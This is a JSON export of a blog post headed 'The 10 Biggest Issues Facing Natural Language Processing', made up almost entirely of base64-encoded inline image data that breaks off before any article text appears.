{"id":4664,"date":"2024-05-22T11:33:19","date_gmt":"2024-05-22T11:33:19","guid":{"rendered":"https:\/\/www.2megy.com\/?p=4664"},"modified":"2024-11-04T13:45:27","modified_gmt":"2024-11-04T13:45:27","slug":"challenges-in-implementing-nlp","status":"publish","type":"post","link":"https:\/\/www.2megy.com\/?p=4664","title":{"rendered":"&#8220;Challenges in implementing NLP&#8221;"},"content":{"rendered":"<p><h1>The 10 Biggest Issues Facing Natural Language Processing<\/h1>\n<\/p>\n<p><img decoding=\"async\" class='wp-post-image' style='display: block;margin-left:auto;margin-right:auto;' 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LNLvbK3iagjXTqL65huO0f3DHw7evfPD96sNKPgmBccjp6Wtu\/Brx8G\/qO0Vb3v\/P4iu3u3J7m9vp4tRaK31GIRXMPSBJwpUFWz27H5H0rGn7bura7iurrUhN07ZrXprbhFCHGMYPY9vr+VWOlWy4Bw+VTrXDW993be+17b67bsr2qqllv6IrNrti4h0620ybU2lt7KaGWAdABlWNshSc98+mfpSTaskpktjqTjTprk3T23SGSxbkV5+vEt3xj86s1Ko+j\/D3FRcNkl7Utly328tivaqt739F9fiV9ttKbC7shdti5vRecuH3cOrcfXv8AdxmsxbeuG1tNYvL8SmEOsKJCIyFb2ZgfMB7enzqfpV\/\/AAmBvGWT2bW1futtaXs7NtlO01LNX3\/JgelZpSvWIBSlKAUpSgI+\/Kx31jMUHIytCG+SshOPzZVH6V+a\/wCkVts6TvJNYjX7DV4hLnGMSJhXH6cD+LGv0rrAQWZmkPFYJI5i3yCOGP7A1Q\/H3bR1\/YU95bxq11pLi7Q479MdpB+HEk\/+UVr3SfArG8NqJbx1Xy\/Y9jgWL7JjoN7S0fz\/AHPyeaUpXEDqYpnAyfaleJmwmAfWrZOybKxV3Y8W0piuopgfuSK36Gr9Xz3OPxq+WcnWtIZc55xqf2rRukUPYn8UZDWhuqV0RcJK\/wAyBUV+FTekoFswf8TE\/wC3+1auQ1X3TtpSlXIxWfpulKV94nGxSvLHHyqP0q61eeW5TU7KKBUlYQMj5MiZOCR7dse\/5CoZ11CpGm07yvy008Xy+Zco3TfgSJIBxmhIX1\/Cqpve43zBPZnZ1rHPGFBulbhn\/wDM22QvMjv0Tc++O3qDxzVLfXvH+62+7ahtHR7LVJBcRKLdkkEJUZilHK4w\/Uzx4EgoQWJbspmLT6tyGcZ9azXydte8ctKtrmebbumXUVuWJkkeINInw\/IMoEyKOMo44bjzznMYyR0pvHxen0\/QNQsNm6deLe6RDcaioY25jumt3ZhGJpVcKJRGvBlzxcktkcSB9N6iAZLdqyCGGQciqHe33ihHpdvBaafYzX8kl2lzM0QCKvW425Vet2+zbmTybPTwQpfK+dV1LxX0m2NrouhafqzQW8RFzIyxmaUxnmOBlH\/UjIJLAAXCEcuk4YC\/FgPWnIE4zXyq91\/x2mltxZ7UsERYlmkbjED1hktCyG6OUIYAOGUhoy2OLADbDuLxsbVS0mx7KK1+L0+Fuc8TL8Oep8XKhWbkWXMfEEdwMcc5IA+o1gkD1qg6TubxOuNP1hLza+nS6npq2ogjjlMUV1JIqySpyZ2CdNX4cgWBZS3YEII5NyeONwkrNsjSLblKxjDTLIY4grlQSJxzdj0wfuBSTjmPOAPp4ORkVmvmem6z42W23br+I7c0261SOWL4YrwXqRlCX5J1wOfMcR51AV1bLlWWu7Vdd8WbXQIbnTdq6Zd6tO8oNt1VVIB1kEfItKAw6XUZipzkKAvfFAX0EHsDWa+YHXvHC3sNUnTZ+k3N7A8b2cTXKIlyq2zNIgPU+yDTKiqzF+HUJPLjiti6545yTW9uu2NASOSRElunY8olaRl59ATHlxSPkQJc\/bRgfcegPpdY5D0zVD3DuDxXsrWxOgbO0y9mnsoZLoy3YjW1uP8Aqpx5faDBHHBAypy2DlYjVNY8dZFT+H7e0iBw2fMFYPhFxzPxHkV3ZshQzKEIych6A+pgg+lZrj0ea8uNLtZ9Rt+hdyQo1xF2+zlIHJexYdjkdiR27E+tdlAKUpQClYNM\/OgM0rFZpcClYJxTNLgzSsflWaAUpSgFKUoBSlKA03dtHeWs1nMMpPG0bfgwwf51xpDFq2irBdIsiXdsFlVhkMGTuD+tSJ7AnGa4NJiaC2lt2YExTygfRSxZR+SsB+VWzipRcXzKpuLuj8T7l0Wfbuv3+iXCkNaTtGCT3Zc5U\/mpB\/Ooyvr\/APSN258DuG13DDEeneqYJmA9JE+7n8VP\/or5BXz\/AMTwvYsXOj4M67w\/E9rw0KvivXmK0TnzAYrf2965mbkxNeViJWjbxPRprW55q5aBKZdLhz6pyX9CaptWjaswNnLbn7yScvyYdv5GtW47Tz4XN4MlZN+lWGxThaRL\/lzVeAyQB71Z1HFQo9AMVphBWeiRmlKVcjGZ+m6UpX3icbPLVgferLe1R2k6zbarNdRQQzo1pK0L9SMqpIJGVb0I7e351BOvSp1I05u0pXsvG25coyaclyJCVmSN3VeRVSQPma47C6mu7OO5uLOS1kdctFIQSv6VAb68QLTY8thHdW4mOoMqRL1lRmY3NvEVQEZZuM7Pgd8RH8RXk8ddrNYLqM9hqcERuJIBHKsAkJRYiSB1O+esnZSxxkkDBq5wk6inm0tt9NfHQKzVrEhN4h6vFf3FjHsTW5FhmeNZvhJVikxJxHEle4IwSTjuy45KHZWkb93Bqmtw6RPsHVNPErzrLNcq3AcEYqBIqmPJZcZ5YIYFDJ5uGjR\/GfaO4U3HJo9rqd0m2ZTDcyi3URzsJGjxC5YK+SpwcgEEHOKjbb+kJs27H2Oma0C7yRJHNbRwyOyeoCPIrHuMZxgH7xUVKWkqPEPclwzta+HerRwmETQ\/FK8csnnUFSqI4jbjzOHIPlHbzDGdY8RtW0y9u7K32JrV18POiQzx2k7wzJ2LtySJsYyMY5AkjB8r8YJ\/6R2yEVXfStxj4iWSCJDph5O0boGXhyyP7T+8B3UjuRit2qf0gdpaOjXeqaZqcNqkUrlzHGXcr8OcJEHLNlLlWPuArZA9KAnJfELXY1gVfDzWjPNPJbMjR+VXUKc81DKYzy7P2BCtjJHE+n35r0emaPf\/ANRtTnfVZJongiikBtOMoVGkDxqyqyknLKBnGcLlxETeOe3rO7fT7\/SNQiug8sYSNoJCxjlmjOPtByybduwzxyvPiCCd+ueM2jbfi0bUL3Sb74DWdOuL9Jh0w0XSMX2bgvxDfat35YJUKpZmUECS0vfetahLetLsPWLaG0tp54xJGepcMgRo41BAUM4ZsDl2IwSGDKvBP4kbohaym\/4bam1vdMpkMYkaVAQ3bh0xxbIGOZUYILGMFivc\/ijo1vFoEs2i6yn9ZYEnslS1V+KMUVeqVYrH5pIV8xHeVB7NxhW8eduPpl1qVnpl86211HZZleBI2leIyhQ\/UwcJjPHl38v3gyqBt\/4o7omuYIoPDTWYw\/BT8RDcAcmYe6wkBQue5xgg54rwMnTZ+Juqz65YaFPsTVYJLyGOZ5HDlYVeREGRwz2DZY+ilSCceapPW\/EnRdE1q00FrW6vby\/jgltRamFhJ1mdUxycHBMbebAQZXLAsBVcl8eduRkz\/wAPvnhWOCXmDG7AOzB\/JGzFuKpnKhhyPA8WwCB23PiVuGLUZreDw+1Oe2t1uepKIZzlo5OEfHhEykN7gEsMMeJAUydVv4i6zPqVhp8mwNYgi1CIyfEPBKY7bEyx8ZsRnixBZgBnsFLcVPIR2j+O21teurCystH1xTqeDHNNbxoiAzwwDkDJyHnuIfRT2bPoDXXL4waRyu0tdG1SQ6fcfD3PXSO3VGBdWIaRgrANDOOQPDMLd8FSwHRoW\/tw6xYX17dbA1PT3s4ZW6dwsqtNIgGFjXpBm5HOCF+7gjJyo2aHv7WdY1OwsrjYuq6bDePMXluopR041RipOI+KksuMMw7MhHIkheCfxj0Cw0XTtW1XTb22a\/wvQHSkZGKRPgAPmTKzJxCAue\/lyMVyWvjztW5vbiD+G6ixis572DpLHM0qQiXrAFGKdjEQuHPI5x91gAJN\/ETV4bjSbGbY+oR3Wp8wqMx+yAdVBJCE4CurMSBxGccsEjSviTr9xot1qsXh5q8L27hUguIJ1eUC4SJ24rEXxwYyLhSSFbyjj3irH+kRs3UtPfVNP0nX5LWNblzMbWNF4QJzdhzcchxPYDJ+ncEym4\/G7Ze2dv2W49QW\/e1v9RXS4VggV5PiOQR1IDdgkuY3OcK6kHt3oA3ijrKNgeGe42HXEXEW0nLiSe+eGOwx78cnHLiC48jxK3JGbdpvDzVJFuLYXH2dvcFkPxEqFTmEf9NEcA8WPNfKFyy9mn+K2jX17fWcNhdIulWE99ecjF1E6YjLRhFckn7Q9+ykqQpbBqIHj9suSRreGw1e4YPGoVLZQzs8kaYCOyv5Wk4klcBkZQSw4kDpuvFTcSoTa+GmtkqYiWlgmCEMMuAen2IAPc4XynJBKB5u\/wB5yabJJy0iR4kHIE8w0jdZoyFVlDHCrzzjj3GDghjXR48bWt9Fg13UbC+jtr171LcW4jumZbcjlkxuRlgcgKSMK2T27cs39IvZFtOkN5pmuQ9WyN9Gz2akvGMkqFVy\/PsexUDsxzgEi6DSd5K6I6kZSVouzLC\/iCxtzdJpZKoxzF1G6h8oIP3R7lh2z2XsCcCuj+v8axXMzaTKggQlIzIObuGAwAoIxgg5BJIBwCQRXnZviFpm9rkpptlcQhEfrC6Cxyowjt5FAQMSQVuPXtgqRirh0kJyUGfnipXUpP3fUhVKuvf9CkzeIksFzJE2gymNMjKTc2Y47D7vEH8Wx6984Dc58TJiw6e3pODIGXLPyPlLEfcxnuuPT1IOGBUfQOkmchBmsdJM5KCqqrRXuepY6GI\/+noV3bm7otf1S+00WhhksliZiJeatzLDt2HYcR3+voPezV4CKDkLivdQycZO8VZGTSjKMbTd2KUpVpIKUpQClKUAqPs1MWpX8fcrL0rgZ9iVKEf\/AMYP51IVHTiaHWIHUDozQSRufcuCpT9jJQMpHjPts7h2jqNvEnK4t0+MgwMksgyR+YBH5ivyZ8\/lntX7n1ZFPBm+6QQe2a\/HG\/tvvtjd2paQQOmkxkhx6dJ\/Mo\/IHH5GuSdM8H1eI69c9H+DfOi2JzU5UH8V+SuyHCH69q5u\/vW64Ydk\/OtNc8xErzsbtTXduKndqS8bmaHP30DfmD\/96gqktvSCPVYh7OGX9jXl8Rp9ZhZx8v3Ly7Wq87mJfmwz+FWOoLS053qH\/Bk1O1z8xaz1FKUqqIGfpulKV94nGzy3tXlFAPYe9emrksNTsNQeZLK6SVreQxyqp7owJBBHqPSopVKcZqEmk3t5+Niqi2m0tEdEwVQZWbAUZPbPYVwQSaZrdnDdRGK7tnZJkLLyAdGyp7+hBAI98jNRm89\/ba2OLc7lvGt47xW6Z6ZYMQ6IV7e+ZV\/AZJ7Coqfxe8P7GxM6X07dONysNvYTSMQqhvJwQqylTyVgeBUFwSoLA1UdRNNZbfO47ttdyRuPEDa1rdzWN5qCxXUBYSxEZcBWI7hc4zxYqpwzKrFQQCRzWPiDsPV9Wg\/hd8l7d3KPEs0Vs5+zRXfu\/H7h4vx7kMVfjni2OPXN6+EG3del0XV\/4emsMRJJDFpTzyu7sj9+nGxLk9JiPvZaMkd1zzaX4oeDM80GsW9\/psFxdTT\/AA901iUaVTnlOsnHvE\/HtLngzeXPIcRKUJM+KOxJZrhbXVfjRAgaWS0gkuIuPNVzzRSCMuvpn9jjsud87ct2vjeTSxpp7Msz8OYypjBwqZY95U9vfI7VVj4p+Edve6fpsmntbNc\/FW0PV0WSNYvhw7PEQYwUfCMwixzwQxUBhmVst7+FGpW+r6xp4tbowW9rdX8kWlSmSVJ+0Ax0+UrsU48ByYMvEgEYqOoptdx2ZfDJfvomtK3jt3WYZ5tLvxMttH1ZGMToFXGSTyAx35A59GVlPdWA8Q752vMWU3rCRJHgaMwOWV1+8vZTn0x298D1IFViPxQ8GYozDLNbWralDmaNtJlXqRsjFi5EfEoFjkDMTxHRlBP2bY26fuXwf1i4s9PsbW1lF6iSW+NMkVCGleAcvIBH9pAY8vxGeC+pUGajkUf7+\/l+5jV+tc\/7FkvP9i1vurb6RLMb9WiKxEOqOwHNeS5IGB5eJx7BlJxyGeRd9bVl6q\/xFk6LFWMltIgXyq3fKjthwD7ZyPUECt65vnwf03UJ9O1O3jmu7adre6jXS5ZDCY4Xbm\/k7pwDhWGQx5KuSCB5\/r14J3EzW8UUF117GS\/ZodGnlSS2WCOZnDLEQ46ZhOBkkmNccioqROhzv6EbWJ5W9Swnd+0LC2TUerwae3QqiWriUxrgqhXjkYMgwDj7\/wBa2NvnbJnmtZLx0ngLAr8NIT5T7YXvkkYA7kkAZNVi33l4LX5sDFZ2hg1QM9rNLpMiRzJCYx1ELIOUSiVD1R9mo9WFWbRNN2Buexk1LSNH0+4t7hikrPY8DIe33ldQSCAhBI7rxIyCDVU8P5+hT\/L8Y+p1XO7NtWbLHd6nFFLwSQRPnnxYcg3Ed8Ad8+i4OcAVmPdegTJLIbx1ig6fUeSB0X7RiFxlRkdiSR2A8x7d67ZtuaJcSpPPpVpJJGAEd4gzLg5GCfTuM1hdtaEjO6aRZq0mOREK5bClRn54BI\/AkVb\/AGbc\/Qr\/AJF+VvmRR3XtCV49Re6BeBSI5GtZA6q4GeOVzg4UHHvxB8xAp\/WbaFzeqwnSW5gLQq\/w7lo+TcWUNx7Ale\/fGBn071IJtLbilyNCsB1FCN9gvdQAAPT0HFe3p5RWxNrbfj5cNFsV5MGbjAoyQSQT29csx\/M\/Orv8fz9C22K\/19SJXfm1m6Zhu5SJVDjFtIOIJRfMSvlIMqgqe4ORjIIHRo2ubbkmXSNHlReSmVIo7dkX2LH7oA7v39+XIHuDjpTZu1ogVi27pyBuWQtsgzyADe3uAAfngVvs9u6Jp0qT2Gk2lvIgYK0UKoQGOWAIHufWqS6m3dvf5F0O037zVvmdwiz5s\/p86GAEli574\/atg9KzUJlGsxZP3q8\/DgsSSCPYY7A\/\/MVupQGtYgpJzXsDAxWaUApSlAKUpQClKUApSlAKUpQCuDVnMPwlxglY7pAwHyfMY\/dwfyrvrh1syLpV1JCnOSKJpYx83XzKP1AoBqS5tw3rhgfyr4D\/AEiNu+TTt1QxjCZsrg+\/fLIfw++PzFfoS4CT2TFMFWQMpHy9RVF3\/oibi2fqellMySQl4fpKvdP\/AFAVpvSnCqtSknzV\/mj2+C4l4evGfK+vwZ+PpWDOcenpXissrKxVlIYEggj0NYrhsm27s6zHYVuspOjdwS5xxkU\/lnvWmsj19ajqRzxcXzKn1PRU+2d\/ZVxn6k\/\/AGqXqK263VsfiT6ygE\/pn\/c1K1zaccsmjDqO8hSlKIiZ+m6UpX3icbPLfWuayt7GLqNZRRLzdjIYwO75Oc49811EZrg0zRLHSZLmWzjKtdytNKSSSzH8fxrGqxm60HGKaV7t7r4ac+exdG2V6mjW7PbmoTRWmvWtjcMsU08aXUauFjCiOVxyHYcZQpPybHoTUNbaR4YXMw0uzsNvzSTxifpRJExZAqqrdvYq6gfNW7dqmNb21b63cxXUl\/eWskdtPaFrZlUvFNw5qSVJHeNCCuCMeuDioLR\/CbbOiajb6navdPNZ3E91bmVlPSlmP2zKQoOXHbBJABIUAdqyS06LtdhXuuJBcxaRdagBJdnKo7J8OUVpGPohRuAycYOB7Yrl0uw8I7PSGuNGh2xFptpE9qz27QCGKIDDRZXyhMD7np9K69J8NtvaLbTWlmJTHNby2pWUiQCJ44oyuGBDAJBGo5Bs4JbkScwzeB21Gs9Nsm1LWXXSpviIJJblZZTIJHkDO7qSxEksrZPfLnOQFAA7bXS\/CnUXstRisdvSyO73FpLIsfUZ2JhZ15eYsSxQn1JbH0rbo+1\/DiDUNSOnNpkj6pKkE9oksRj6tp2wI19XTIyTlhhBkBVA5ofBnaFvLYTQLco+mSRzWz5RnjdJZJAyuyl0J60qkoVyrsD61IHw30J9Yt9alluXmtZ5rhEZlKBpDKxHpnAaeY+vfng5AUADjfQ\/CB5bOx\/he2p21GMwW6COGTqxNHKvEeuUZXnX5Hm47ljnpSLw00VUvIk0G2UTRWYmUR4WTn1o4yw+75vOAcdzn1NRsnghsya5hubh9QmMK3K8XuMA9eDoSfdAK\/ZhAoXAXgpUAg57R4S7UTSZNFt0mt7V5TIqxCMGNT1PsxlTlPtpMBs45nGKA2Novhfqt6J7ix2\/cXk7lFLrEZJCZJD2B7nL9UjHvyI960221PCuzknWC10QvO0kRUyRkoqRKkkSDPlVViGVHYccn0rxD4Q7ZttwW25ILjUFurSeaeEGfksZmlWWRU5Asis6LlVIBHIH7754pvArZdxNfXNw19NPqN093PLLPzJdoUh7ZGCOEaDDZB4985NASlppHhXLpthrNvZ6ALK2QvZXBWIJEkhVT0yeyqxiTsOzcB64qTstV2bpLz6Rpmp6PbPagNPbxzxIYu6xrzUHI7hV7\/ID5VDX\/hBtTUUsVufinawgMEbNIGDAuWJaNgY2PmcDKYAkcAd+3ifwg25cac+kPd3osivTSFSgEcf2nFB5e4AnmGX5E9QkklVKgWCTeW2Ierz3DYEwxNMypOrngueRAByccTnHpXVJuHQra4eyutc0+K5jVmeJ7lFdVC8ySpOQAvmP07+lVC+8FNoX7WHUkv4o9N0tNHtoorjCrbrDLEp7g+cJPIOXbORnOBWzWvCLRde3PLuW81XUEaaBYnt4WSNOaspSUYXPMFQc+pwobKqFAFuXXNFaRIl1iyLyGMIouEyxkBMYAz35BWI+eDj0rVHuPQ5b02EOtWD3Cq7tEtyhcKrFWPHOcBlYE+xBFV6z8KdtWUtlKj3Mn8PaNoEl6bovCOKP0Ke4gh7+oKArx7593PhhotyHU316iSSSSMkfTVPOrqVC8MKOMsgwMZ5knLeYATMG7NuXFxLaw6\/p7yQTC2kUTr2mIyI\/X72Ae3r2PyNdr6ppi2sF7\/ELUW90UEEpmXhKX+6FbOGz2xj1qmnwa2oz28kvWma2HTXrBJVMQREEZV1KsAsUfcgt5fvdzmYl2NZ3Gi2+g3Gp30ttayI0XJ15cVj4BG8uGXuW9OxI444rgLEpY6\/omopCbLV7SY3HaJVmUs54B8Bc5zwYNj1wQaza69o13DPcQavZSRWyCSZ0nUiJME8mOfKMAnJ+Rqt6b4Ubb0u7guoJboi2mM8URZRGG8hHZVH96JGJzliCW5ZOcw+FG1YLe\/gSKcfxIR9dhKc5SZ5kIzn0kcnByCOxBGQQLBdbk0C0hinn1qyVJ8GI9dSZPT7oB83qPT2Oa1Xm7Nt6fyN\/uLTLcIIi3Uuo14iVwkZOT2Dsyqp9ycDNV1PB3aUNpb2NqLm2gt7mS7EULhYzK\/HLcMcV+7kBQAMnAA7Vph8FtrQai2ppeamZS0DIDOpWIwyW0kfAcewBs7fI7g8DnJZiQLZbbl0C5WN4tbsSJ+l01M6hiZVDRjBOcsCCB6mpSvnWk+BGxNGW0js4bvp2MMENsrzZMYiPJe+MnLd+\/wCWB2r6IBgAE5oDNKUoBSlKAUpSgFKUoBSlKAV5cBhg9wfUV6pQHBpMiy6XBGO5jQwN\/qQ8G\/dTVe1qTpxiA+rk5\/AVYdPKJLewIuBFck4+rqrk\/qx\/eqvr751OVAeydh\/OtS6XT6rCKS3eh6PDY5qtvmflzxP0H+A7wvI41Iguz8VF8sOSSPyblVTr7h456ELrRLXXY189jJ03wPWN\/wDs2Mf6q+H1w\/FU+rqtcnqdW4bX6\/DRb3WgpSmcd8VjmcfUtoB\/6vWjOMFg36BiB+wqZrl0iD4bRbCHGCtvHkfXiCf511VzzHw6vEzj5mBmz6gnFeOf4\/pWSc14PrWKiqR+oKUpX3kcYFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKVgnFAcBaK31S5dmwZbZHA+fAtk\/+pf2qoaixe5Mp\/v96sW4QkUtpdAkSsZLUYP9x15t+8a\/vUBqA+431xWidMKvWJUl7uv1PX4ZGzcvEhNc0uHW9HvNJnHlu4Wj\/Akdj+Rwfyr8q3VtNZ3M1ncLxlgdo3HyZTg\/uK\/XBGa\/PvjHoH8I3a97BGEg1NBcDHYdT0f9+5\/1VyziFLNFT8Dd+B18tR0nz1+ZRK220JuLiK3HrK6p+pxWqpTa9q15uCwhUZxMsh\/BfMf2FeQbLN2i2fXJVCoqhQAuBge3atBPyrdcSKxwtaK0jjcMmKbXNI82hdx1FYIOazStcr4mVOWWBkpXP0np10b2wtrogZmiWT9QK6h6VAbHu\/i9sWLH1jUxH\/ynH+1T49K+7uEYvt2Ao4n\/AN4xf1RxqvDqqsqfg2jh1x5ItJu5YnKOkEjKw9QQpwaqVtuO9ubXSLW9keK9NzbtNxJAmidCQ31Bxgj5irlqNt8ZZzWhfgJonj5YzjkMZxUVLte0mg0pZXJm0rp9OUDBYKACCPkcfyryON4HiOIr9ZgpWWVK19H3k380lo\/lzJ8NVowjaquf4IuDfsMssTRwWzW1xMIYuNyDNknCsY8dlJx75wfSuy03jazvp8E0DRTXfUWVeWRA6Eghj9WBA+dbtK2\/d6RKkEGp50+NiY7doAXAOfLzz6Z9O2frWufZWmTpqq+dH1N1YupwYyvccf8AzZb8686nDpJCkqmZOV9VJK2ivo1ybWVeCdyVvBuTVtOVvz5rf5EhperLqWmLqxj6cMnJ4znPKME8X\/MAHH1qvPreqaneaFdraC2sbu6LRHr+eRDE5HNQMDPY4yataWVvFZLYRRBYUjEQQdgExjH6VBWe1Ly2k0+OTWGltNLk528RhAbjxKhWfPfAPyrO4lh+KVYUaUG3oszVl3lKLd7+7a+3MiozoRcpPzte+1n67HNbbjvLeEkae01zcarJZmI3XJVbgTlWK9l7emPc1m83nLZ3Etk1rZfEWqK1wsl4IxyYZ4R5XzHBHyHeu5NsBJ45vjCeGpPqGOHzQrw9fr617u9Auv4hNqOl6kLVrrj8QrQiUMQMBlyRg47e49O3zw5YbjsKNoTd7paZX3bO7V+ea19dr2Js+FctV997\/pc0W+6LrV5cbf05LmOOOOSZ55ukFLryCDAOW4kE+3cVi31PXpdd1OyS2tngtkQoDMVKkoSPRTnJxn5fWt9xoN9Hfy3+k6oLNrkKLhWgEgZlGAw7jBxge47Ctn8Gu49Yk1S01AIlwiJcRNFnmVBAIbPl9fkan6ri08nWuWZT1tlUXG0krLw2bvqR5qCvlS1Wm976b+tiM0vcd1NY6fZ6dZtc3VxA9ywubnskYbGS+Dk5OB2rbHuq8uzawadpSvcXMczMks3ARtE4RgSAc989wK9W+057GGzOnap0Lq1ha3MrRBlkjLcsFcjBB+v610adtmLT7i0uEupH+GimRuSjMjSOHZs+3cHtj3rHw9DjycKUpNLupvu6Lu+zpv7V7+RfKeF1aXjbfz39LHD\/AFynn+BS30yNZLtZCfiLgRoHRuJRWwQzZ9B27VYL+5ktLOW5ijjZ40LASSBFyPmx9B9agrjaN1NpY0dNVC2zNIZQbdWJLOWypJ8pGcA\/nUrq2jrqmktphmeMEIFcjl3UgjI9GHYZB9e9ehgf+XhSrdpTlLKsusV3rapW8+b8dtCKp2dyjk0V9d9rkNDvVnt7g\/AwyTwTwRcYLkPG\/VbAIbA9DnIIrpG6ZrWDUBqun9K4sOBEcMnUEvU+4FJA7knHcVr\/AKp3Mszz3WqdR5Xt3cLbhVzE\/IYGewOcdya677bMV9JqLy3TD49IQOK4MbRHKsD798H8q87Dw6ROm5zl3ldJPLZ6Ts3bnfJz\/JLJ4PNZLTTx8r\/k49OvdXuN19LU4Ft1\/h5dYo5i6\/2gGT2Hf2\/3ruutav21GXTNI06O5ktUV52lm6aryzxUdjkkD8BXnTNBv7bU\/wCK6lqi3Uot\/hgFg6YxyDZPc9+1ZvdDvTqMmpaRqfwclyipOGhEitx+6wGRggfjWZh6PEaOE967qNvWOfK\/D3d7fK5ZOVGU+W2m9r\/fx+ZES61q+narrdytkLm2tBDLKrXGOmvTBYIMEE+p9hXZrO7jpNyhNvavbMI2yboLMVbHcR47gZ9z39q65duGaPVka8bnqsaxs3AeTEfHP1+ftXDc7MuJmu44tW6UN6kYkAgBbkihRhifu9gcY+ffvXn1MPx7DU5Rw7bu217Onem0vg1lv4ciRTws5JzW1vHXRfuab68uv4LuuWO4kDQyuIjyOUHw8ZGPl3JNdOr7tTT706fBHbPLDEsspuLoQjvnCr2PI4Hf29O9dDbbaWLVbaS+boaog5oEAKScAhYH6gDt9K8Nt7UROt\/a6usd3LCkN0zWwZZeOcMFz5T3PuRVFhON0Y3oppvd3Tds9R6Ju20o\/K6Kuphpe1+fCP6P5nOu7ry8UtpekCYCzjvW6k\/DCtyyvofN5fwrxcbznaB7nTNNSaOCyS+mMs3TIVwSFUYOThTn0FSq6Hxvbm9a7Ja5s0tGHEDHEseX58vT6VVdb27LazWlvbw3lwbaySCNlsxLHIy5wGwRgfMN279iO9W8RqcewdB1c7d9HZR8dLaPdata320uXUVhakrW+\/zuSl7vdbeWSOCC1boRJJN1roREllDcUBHmOCPXHrXTp26W1TVEtLSziSExJKDNNxlZXUMGVMdwM4Pf1BpFoWqc\/wCIW98llPdxxteQ9ASr1AoBKknt6Y9x2Fb77b9zqGqW91PqOLe1mWaONYAHUgenP1wT6jH09KyKC4+31k5NrMtLRScb+L1Wlrq176EUuy7RXLz3\/wC9ieTuM16rygwteq3hHnilKUApSlAKUpQClKUArFZryxx3JwB3qjdgVndjs5iCEBrd0k\/LkOX\/AKcj86j7xcwE49O9b9XDaitzGGx1lZAflkED\/atCN8VZJKB\/aRq36jNcy4pV7VVqT8b\/AEPew8erjFEfVA8aNCGq7UN\/HEWn0yQTAqO\/TPZx+HoT\/pq\/1ovbSC\/tJrO4TlFPG0Tr81IIP7GtMqwVSDiz2qFV0Ksai5M\/JHqe1T2wWWXcyooJaCGSRj8vQD\/+wqD3PFLtzUbzSJR9vbTPFgj2B7N+BGD+dTvhDCZLzVL1slgkaZ\/1Ek\/yrVqksksnM3ycVLDurysfTD6V4r3XitT6R2pKNX4o86hroKUpWi5nJ3ZlH2nwuuRJok1sT3gnPb6MAf55q61818KbkLc39oT99EkA+eCQf5ivpK+lfbX9O8V2vo5hpc4px+ja+1jk3GqfVY6ovF3+phseprg03V7DVZLmKzlLtaymGUFSOLAke\/4etd7LmvEUEUORFGqAkseIxkn1NbfNVnUi4NKOt9NX4W109TzU42d9yqb38RdM2JqGlWmqWVzJFqQnd54lyttHFw5O\/sF+0HqR6HGTgHUPFfaBvDYPPPFOql2SWLiQgYKXwT\/ZhmUdQeT7xDEI5Xm8Udt7w3DLpY2x8A0EMifHRXcUbiWL4u1dgvMHDBI5GHsSoHqVZajpmxdf03Tr7dN3tO1TUV061sItPNhaTzyMsUMburISg9blQOwIkJbAAUTlpcpPFjbz2Fxe6daXt2baSWJ0WML5omiWTDE8W4tPGOxIJJxkAkbo\/FPbUjJxS86UtjZ36TNGFjMdz1+mDyIKkC2lLcgABjv3wKlb7N8QBplj\/wDhzbkU1ubiSO2WythDbMIYzEyqMgO0ikOQewHbHYnnfR\/EtNyIZNm6fNEdKigA6Fr0FkSd+tEjnLLC0Un2fIFi33wFDCg2Li3i1tT4oWUTXLzuJuP2WIy8QUunU+6WHUQAAnkW8uQCRq\/4wbWinkgv0u7Qx2Qv25x5IiNxJb8sLn\/qRgYGT5wSAA2Ie32fuGHRJrt9pWH8Stb1J7G3ihs1YQlVjdAxUpGzKgLlcf5T6ARce1fEmbXFu32nokVrHb3BZ5rS1eWR3ZimFVgGkDMZHdmVT1JFVQTzKwLxc+JGkW2o6VZNZ3RXVBdBJOI8jwTJE6FR3zyk9ey4UnPpnRpPi5tHWtTOk2D3jTo6xScrZlEbt0CoYn0yLq2\/+qPk3HjvNM3hd7c0mWPb6W2rkzi5K\/CtNaPIjHkj5CBTLwLsg5EdwufSGGh7\/wBMuL9NA2TYWtpDAzWMccdlGet1kY4YHtyEaHuo4MGYmQqi0sCdv\/GbaWjSTR6201qUuLmGMBC5ZIWnVpGI7IubW5OckBY8sV5AV3QeKO17iV7VJLj4lbx7FbfpgyPIswhOACe3NlJyRhWDNgV850Dw48QU1jTl3dt7TNV0mZEtr6KWK1uDFGLWyfA6vqpvTqDux5ucgjuQakIdp+IEF\/Za7ZbQ021vxfLJcutvYiWO2b4szcJF4l5Wd4XyxClmyR9\/KwLe3i7s9LCHV3u3WwkYF53QoI4iqETEEZ4ZkQZ9iSDgqwHo+Luy45BHNfPC3mLiVQhRUkeORiCfuo0b8iOy474OQOHbu2dRaa10rdG1dKVIbaaa0ltrK3aCwmMjLIkeQSpdGiceU5Il5H0FVi28Pd76brFpe2W2NChtLbTZSbe0tbSL\/m\/ikVCDx7sLUzlSxKh5GzkEBQL8viLo5s7W+e0vVhvbx7GI9MZEocRgMCQVy5Cj5H1wASOe\/wDE7SbK\/sLdbOaa21C3tZ4Z17FviOqYlCEZyVglJzjB4jvk4pd1tDxRO3tN0SDbu2cQRyTPCNOthaQzE3APCEthSQ0GCC3Zpwx8w4zmg6Pu6LWPjNf2tCYeSSTBEt5FMsXNIxAC5ZEVekYycEfb8lBdTSwLBZ+JW29S0261PTWmukto1cIihWmZgSI05kAv2IIJGPft3rTP4pbYjjd4ZJpOEcbnMZUDqW5uEBJ+casc+mVIPfFVrcllvuz1fVtH2vszSrjTb23cor20CW0xW3RIuoeQJxJgMGH9mvlBxUZNtHxFOgXVla7W02B5ImaOKKzsIR1OjcqiMAXVgJJImaQFCE7KueWRSxcdP8YtmanNLBaTXheDT5dTlBtHHThjcK2e33sn7vqSCAMqQN2s+K+1tB1aLQ9TF6l\/O6RxwLblizsYF45Hl7NdQAnOMyDvgMRA7W2VuSPcjazrmgabHFd2\/wAFeIOLK8LrI8yiMMUCmfgewBdWzJybJER\/VjxO+OmubbaGg2cK9KO1As7OSdBGYWjJcEKFRlcDtkKqELyGapYqWW08c9jagIJ7O5uJILm2+JjcwsrMplSKMhCM4ZnbB7fcOfau9PFrZ0mjW24I7i7ayuZZYVf4SRSpjfhJyUgMAjZVu3Yg+o71RLXw73\/aaVbaQmzNlQRXFxJJcR22nxSQRJJJBK4YSnLMAHQMM5e3hfiqngMa1t3eemRW8+q7Ts9TittfuBp8cNilw9vbmULazhEUq